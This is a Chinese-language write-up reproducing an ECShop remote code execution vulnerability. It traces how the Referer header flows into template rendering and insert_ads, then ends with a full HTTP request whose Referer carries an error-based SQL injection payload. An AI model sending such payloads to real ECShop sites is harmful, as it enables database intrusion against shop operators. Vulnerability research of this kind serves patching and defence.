ECShop全系列版本远程代码执行漏洞复现

前言

在user.php的display函数中，模版变量可控，导致注入。通过注入，可以实现远程代码执行。

漏洞分析

0x01-SQL注入

首先，我们来看user.php文件：

alt="ECShop全系列版本远程代码执行漏洞复现" />

$back_act变量来源于HTTP_REFERER，我们可以控制这个变量。

assign函数用于在模版变量中赋值：

alt="ECShop全系列版本远程代码执行漏洞复现" />

接下来，我们来看display函数：

alt="ECShop全系列版本远程代码执行漏洞复现" />

它读取user_passport.dwt模版文件的内容，显示解析变量后的HTML内容，并用_echash进行分割，得到$k后交给isnert_mod处理。由于_echash是默认的，不是随机生成的，所以$val内容可以随意控制。

再看insert_mod函数：

alt="ECShop全系列版本远程代码执行漏洞复现" />

这里进行动态调用非常关键，$val传入时用|分割，参数传入时需要被序列化。

再看include/lib_insert.php中的insert_ads函数：

alt="ECShop全系列版本远程代码执行漏洞复现" />

可以看到这里直接可以注入。

payload：

GET /user.php?act=login HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Cookie: PHPSESSID=9odrkfn7munb3vfksdhldob2d0; ECS_ID=1255e244738135e418b742b1c9a60f5486aa4559; ECS[visit_times]=1Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}Connection: closeUpgrade-Insecure-Requests: 1Cache-Control: max-age=0

登录后复制